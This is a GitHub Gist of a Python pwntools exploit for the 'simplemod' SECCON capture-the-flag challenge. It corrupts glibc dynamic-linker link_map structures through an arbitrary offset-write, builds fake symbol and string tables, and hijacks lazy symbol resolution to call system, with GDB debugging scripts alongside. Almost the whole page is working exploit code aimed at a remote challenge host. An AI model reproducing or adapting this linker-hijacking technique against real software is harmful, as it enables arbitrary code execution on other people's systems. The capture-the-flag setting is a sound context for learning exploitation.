-
-
Save galli-leo/31ddf1861a19ffffba9bf1eb7d29aadb to your computer and use it in GitHub Desktop.
Slightly modified exploit for simplemod
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# -*- coding: utf-8 -*- | |
# This exploit template was generated via: | |
# $ pwn template --host simplemod.seccon.games --port 7250 chall | |
from pwn import * | |
# Set up pwntools for the correct architecture | |
exe = context.binary = ELF('chall') | |
lib = ELF('libmod.so') | |
context.terminal = ["tmux", "split", "-h"] | |
DT_NULL = 0 # /* Marks end of dynamic section */ | |
DT_NEEDED = 1 # /* Name of needed library */ | |
DT_PLTRELSZ = 2 # /* Size in bytes of PLT relocs */ | |
DT_PLTGOT = 3 # /* Processor defined value */ | |
DT_HASH = 4 # /* Address of symbol hash table */ | |
DT_STRTAB = 5 # /* Address of string table */ | |
DT_SYMTAB = 6 # /* Address of symbol table */ | |
DT_RELA = 7 # /* Address of Rela relocs */ | |
DT_RELASZ = 8 # /* Total size of Rela relocs */ | |
DT_RELAENT = 9 # /* Size of one Rela reloc */ | |
DT_STRSZ = 10 # /* Size of string table */ | |
DT_SYMENT = 11 # /* Size of one symbol table entry */ | |
DT_INIT = 12 # /* Address of init function */ | |
DT_FINI = 13 # /* Address of termination function */ | |
DT_SONAME = 14 # /* Name of shared object */ | |
DT_RPATH = 15 # /* Library search path (deprecated) */ | |
DT_SYMBOLIC = 16 # /* Start symbol search here */ | |
DT_REL = 17 # /* Address of Rel relocs */ | |
DT_RELSZ = 18 # /* Total size of Rel relocs */ | |
DT_RELENT = 19 # /* Size of one Rel reloc */ | |
DT_PLTREL = 20 # /* Type of reloc in PLT */ | |
DT_DEBUG = 21 # /* For debugging; unspecified */ | |
DT_TEXTREL = 22 # /* Reloc might modify .text */ | |
DT_JMPREL = 23 # /* Address of PLT relocs */ | |
DT_BIND_NOW = 24 # /* Process relocations of object */ | |
DT_INIT_ARRAY = 25 # /* Array with addresses of init fct */ | |
DT_FINI_ARRAY = 26 # /* Array with addresses of fini fct */ | |
DT_INIT_ARRAYSZ = 27 # /* Size in bytes of DT_INIT_ARRAY */ | |
DT_FINI_ARRAYSZ = 28 # /* Size in bytes of DT_FINI_ARRAY */ | |
DT_RUNPATH = 29 # /* Library search path */ | |
DT_FLAGS = 30 # /* Flags for the object being loaded */ | |
DT_ENCODING = 32 # /* Start of encoded range */ | |
DT_PREINIT_ARRAY = 32 # /* Array with addresses of preinit fct*/ | |
DT_PREINIT_ARRAYSZ = 33 # /* size in bytes of DT_PREINIT_ARRAY */ | |
DT_SYMTAB_SHNDX = 34 # /* Address of SYMTAB_SHNDX section */ | |
# Many built-in settings can be controlled on the command-line and show up | |
# in "args". For example, to dump all data sent/received, and disable ASLR | |
# for all created processes... | |
# ./exploit.py DEBUG NOASLR | |
# ./exploit.py GDB HOST=example.com PORT=4141 | |
host = args.HOST or 'simplemod.seccon.games' | |
port = int(args.PORT or 7250) | |
def start_local(argv=[], *a, **kw): | |
'''Execute the target binary locally''' | |
if args.GDB: | |
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) | |
else: | |
return process([exe.path] + argv, *a, **kw) | |
def start_remote(argv=[], *a, **kw): | |
'''Connect to the process on the remote host''' | |
io = connect(host, port) | |
if args.GDB: | |
gdb.attach(io, gdbscript=gdbscript) | |
return io | |
def start(argv=[], *a, **kw): | |
'''Start the exploit against the target.''' | |
if args.LOCAL: | |
return start_local(argv, *a, env={"LD_LIBRARY_PATH": os.path.abspath(os.path.dirname(__file__))}, stdin=PTY, **kw) | |
else: | |
return start_remote(argv, *a, **kw) | |
# Specify your GDB script here for debugging | |
# GDB will be launched if the exploit is run via e.g. | |
# ./exploit.py GDB | |
gdbscript = ''' | |
# tbreak main | |
dir /usr/src/glibc/glibc-2.35/elf | |
dir /usr/src/glibc/glibc-2.31/elf | |
b _dl_fini | |
b dl-fini.c:146 | |
define over | |
# set *(char [1153]*)0x00007ffff7fbb220 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
set *(char [0x2001]*)0x00007ffff7fba0c0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
# set ((struct link_map*)0x00007ffff7fbb220)->l_next = 0x7ffff7fbb730 | |
# set ((struct link_map*)0x00007ffff7fbb220)->l_real = 0x00007ffff7fbb220 | |
# set ((struct link_map*)0x00007ffff7fbb220)->l_initfini = 0x7ffff7fbbc10 | |
end | |
define brs | |
b dl-lookup.c:404 | |
b getint | |
b menu | |
b _dl_fixup | |
# b do_lookup_unique | |
# b __stack_chk_fail | |
# b *(0x00007ffff7d8e000+0x000000000005a49e) | |
b system | |
# set *(char [16]*)0x7ffff7fbb118 = "system" | |
end | |
set $l = (struct link_map*)0x7ffff7fbb220 | |
continue | |
'''.format(**locals()) | |
#=========================================================== | |
# EXPLOIT GOES HERE | |
#=========================================================== | |
# Arch: amd64-64-little | |
# RELRO: Partial RELRO | |
# Stack: No canary found | |
# NX: NX enabled | |
# PIE: PIE enabled | |
NUM_OFFSETS = 0 | |
def do_exploit(link_map_add = 0x0, main_off=0x0): | |
global NUM_OFFSETS | |
NUM_OFFSETS = 0 | |
def do_offset(offset, val): | |
global NUM_OFFSETS | |
io.sendlineafter(b"> ", b"1") | |
io.sendlineafter(b"offset:", str(offset).encode()) | |
io.sendlineafter(b"value:", str(val).encode()) | |
NUM_OFFSETS += 1 | |
log.info("USED OFFSETS: %d/%d (%d)", NUM_OFFSETS, 30, 30 - NUM_OFFSETS) | |
def do_bs(offset, bs: bytes): | |
idx = 0 | |
for b in bs: | |
do_offset(offset + idx, b) | |
idx += 1 | |
def do_p64(offset, val): | |
do_bs(offset, p64(val)) | |
def do_exit(): | |
io.sendlineafter(b"> ", "0") | |
io = start() | |
LINK_MAP_OFF = 0x11a0 | |
LINK_MAP_OFF = 0xf80 | |
LINK_MAP_OFF += link_map_add | |
LIBC_LINK_MAP_OFF = LINK_MAP_OFF + 0x520 | |
NEXT_OFF = 24 | |
INFO_OFF = 64 | |
FLAG_OFF = 798 | |
GNU_SHIFT_OFF = 764 | |
GNU_CHAIN_OFF = 784 | |
BIN_BASE = 0x007ffff7fb6000 | |
BUFFER_BASE = 0x00007ffff7fba080 | |
BUFFER_BASE = BIN_BASE + 0x4080 | |
BUFFER_OFF = 0x4080 | |
def info_off(dt): | |
return LINK_MAP_OFF + INFO_OFF + 8*dt | |
def libc_info_off(dt): | |
return LIBC_LINK_MAP_OFF + INFO_OFF + 8*dt | |
log.info("Setting this flag, so that D_PTR is relative to base address!") | |
flag = 0x4 | (1 << 5) | |
# do_offset(LINK_MAP_OFF + FLAG_OFF, flag) | |
# log.info("This should cause the resolution to fail") | |
# do_offset(LINK_MAP_OFF + GNU_SHIFT_OFF, 7) | |
def do_brute(off, val): | |
do_offset(off, val & 0xff) | |
do_offset(off+1, (val >> 8) & 0xff) | |
# new_hash=0xcbff3bcd | |
# do_offset(0, 0) | |
# pause() | |
# log.info("Causing over") | |
# do_exit() | |
# io.interactive() | |
GET_IMM_SYMIDX = 0x9 | |
log.info("create fake symtab info element") | |
RELOC_IDX = 0x2 | |
FAKE_SYMTAB_INFO_IDX = 27 | |
FAKE_STRTAB_INFO_IDX = 28 | |
FAKE_SYMTAB_INFO_BUF_OFF = 0x40 #info_off(FAKE_SYMTAB_INFO_IDX) | |
FAKE_SYMTAB_INFO_BUF_OFF = info_off(FAKE_SYMTAB_INFO_IDX) | |
FAKE_SYMTAB_INFO_BIN_OFF = FAKE_SYMTAB_INFO_BUF_OFF + BUFFER_BASE | |
FAKE_STRTAB_INFO_BUF_OFF = 0x50 # info_off(FAKE_STRTAB_INFO_IDX) | |
FAKE_STRTAB_INFO_BUF_OFF = info_off(FAKE_STRTAB_INFO_IDX) | |
FAKE_STRTAB_INFO_BIN_OFF = FAKE_STRTAB_INFO_BUF_OFF + BUFFER_BASE | |
FAKE_SYMTAB_BUF_OFF = 0xf0 - 0x18*GET_IMM_SYMIDX #0x60 - 0x18*GET_IMM_SYMIDX + 0x40 | |
FAKE_SYMTAB_BIN_OFF = FAKE_SYMTAB_BUF_OFF + BUFFER_OFF | |
FAKE_SYMTAB_BIN_OFF = FAKE_SYMTAB_BUF_OFF + BUFFER_BASE | |
FAKE_STRTAB_BUF_OFF = 0x60 | |
FAKE_STRTAB_BUF_OFF = FAKE_SYMTAB_BUF_OFF | |
FAKE_STRTAB_BIN_OFF = FAKE_STRTAB_BUF_OFF + BUFFER_OFF | |
FAKE_STRTAB_BIN_OFF = FAKE_STRTAB_BUF_OFF + BUFFER_BASE | |
FAKE_RELOC_BUF_OFF = FAKE_STRTAB_BUF_OFF+RELOC_IDX*0x18 | |
FAKE_SYM_IDX = 1 | |
FAKE_SYM_IDX = 11 | |
FAKE_SYM_IDX = 6 | |
FAKE_SYM_BUF_OFF = FAKE_SYMTAB_BUF_OFF + 0x18*FAKE_SYM_IDX | |
FAKE_SYM_STR_OFF = 0x70 | |
# FAKE_SYM_STR_OFF = 0x1080 | |
SYMTAB_BASE = BIN_BASE+0x328 | |
STRTAB_BASE = BIN_BASE+0x460 | |
do_bs(FAKE_SYMTAB_INFO_BUF_OFF, p16((FAKE_SYMTAB_BIN_OFF) & 0xffff)) | |
do_brute(info_off(DT_SYMTAB), FAKE_SYMTAB_INFO_BIN_OFF-8) | |
# do_bs(FAKE_STRTAB_INFO_BUF_OFF, p16((STRTAB_BASE - BIN_BASE) & 0xffff)) | |
# do_bs(FAKE_STRTAB_INFO_BUF_OFF, p16((FAKE_STRTAB_BIN_OFF) & 0xffff)) | |
# do_brute(info_off(DT_STRTAB), FAKE_STRTAB_INFO_BIN_OFF-8) | |
do_brute(info_off(DT_STRTAB), FAKE_SYMTAB_INFO_BIN_OFF-8) | |
# do_exit() | |
# io.interactive() | |
# do_brute(info_off(DT_JMPREL), FAKE_STRTAB_INFO_BIN_OFF-8) | |
# do_brute(info_off(DT_JMPREL), FAKE_SYMTAB_INFO_BIN_OFF-8) | |
FAKE_VER_INFO_BUF_OFF = 0x90 | |
FAKE_VER_INFO_BIN_OFF = FAKE_VER_INFO_BUF_OFF + BUFFER_BASE | |
# do_brute(info_off(0), FAKE_VER_INFO_BIN_OFF-8) | |
FAKE_BUCKETS_INFO_BUF_OFF = info_off(FAKE_SYMTAB_INFO_IDX) | |
FAKE_BUCKETS_INFO_BIN_OFF = BUFFER_BASE + FAKE_BUCKETS_INFO_BUF_OFF | |
FAKE_BUCKETS_BUF_OFF = 0x80 | |
FAKE_BUCKETS_BIN_OFF = FAKE_BUCKETS_BUF_OFF + BUFFER_BASE | |
# do_brute(LINK_MAP_OFF+GNU_CHAIN_OFF, FAKE_BUCKETS_INFO_BIN_OFF) | |
# do_brute(LINK_MAP_OFF+GNU_CHAIN_OFF, FAKE_BUCKETS_BIN_OFF - 0xb*4) | |
# do_bs(FAKE_BUCKETS_BUF_OFF, p32(0xcbff3bcd)) | |
do_bs(FAKE_STRTAB_BUF_OFF, b"exit_imm") | |
log.info("Constructing call to system!") | |
do_bs(FAKE_STRTAB_BUF_OFF + FAKE_SYM_STR_OFF, b"system") | |
